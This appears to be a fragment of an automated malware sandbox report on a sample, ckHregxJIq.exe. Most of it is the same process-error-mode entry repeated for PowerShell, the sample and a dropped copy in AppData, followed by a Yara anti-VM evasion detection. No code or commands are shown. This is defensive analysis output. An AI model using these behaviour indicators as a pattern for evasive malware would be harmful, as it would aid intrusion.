Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: BF0000 memory reserve \| memory write watch	Jump to behavior
